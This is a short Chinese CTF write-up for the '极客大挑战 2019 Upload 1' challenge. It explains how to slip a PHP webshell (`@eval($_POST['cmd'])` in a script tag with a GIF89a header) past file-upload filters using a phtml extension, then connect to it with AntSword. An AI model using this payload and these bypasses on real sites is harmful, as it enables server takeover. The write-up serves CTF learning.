[极客大挑战 2019]Upload 1解题思路
2023-02-19 12:17:57 时间
首先我们先看到页面内容:
是一个文件上传,可能会是白名单绕过,也有可能会是黑名单绕过。
先上传一个php文件看看回显
回显提示说我们没有上传一张图片,一般的来说,上传图片或者别的什么,有可能就是白名单绕过了。
我们上传一个木马,然使用BP抓取一下我们上传的数据包
看到了content-type我觉得可以尝试修改一下进行绕过
但是页面却回显说NOT PHP,也即是说,我们不能上传以php为后缀的文件,我们这里想到了php3,phtml,Php等等
我们一一尝试一下。
当我们把后缀修改为php3的时候,却回显说NOT PHP3
然后我们尝试一下phtml
回显说是我的内容里面不能有<?
也就是说普通的一句话木马不能在这里使用了,这里是这样的,我们可以使用js+php进行bypass
payload1
<script language='php'>@eval($_POST['cmd']);</script>
但是回显还是说不能上传,意思是不是一个图片,这里我们可以使用gif文件头欺骗来进行绕过
payload:
GIF89a <script language='php'>@eval($_POST['cmd']);</script>
然后我们修改到我们的数据包里面:
发现上传成功。
接下来就是需要找到我们这个文件的位置,然后使用蚁剑进行连接就可以了。
在找文件目录的时候这里是需要一些运气的或者说是经验,我们可以猜测一下目录位置是/upload/访问一下看看
发现确实是这样,然后我们就可以这届找到我们的文件,然后进行连接了。
相关文章
- CAD2010简体中文版含注册机下载CAD软件全版本下载
- CAD去教育版插件合集(最高支持CAD2020版)CAD软件全版本下载
- [Win] 3D制图CAD软件 Autodesk AutoCAD v2020 中文版及注册机
- uto CAD2021软件安装教程(附下载方法)CAD软件全版本下载
- 高级设计师必备的CAD全套神装!cad软件全版本下载
- 系统的讲解网站的优化
- 百度自动提交链接软件脚本 – MIPCMS搜索引擎提交器
- 博客网站保护版权,防止复制查看源代码的方法
- 炫酷的网站小工具-倒计时代码
- kotlin获取属性注解
- 【CheckStyle】Each variable declaration must be in its own statement
- 编译适用于 PHP 8.2 的 redis.dll 扩展文件
- Webpack自动清理打包目录
- 基于ERNIELayout&PDFplumber-UIEX的多方案学术论文信息抽取
- YACC移进规约冲突案例分析
- 嵌入式:I/O接口扩展
- LongAdder源码【原创+图解+视频讲解】
- 红中私教-文件上传漏洞DVWA靶场实战(浅析)
- UDP协议重点总结(附实例)
- Swift 单元测试入门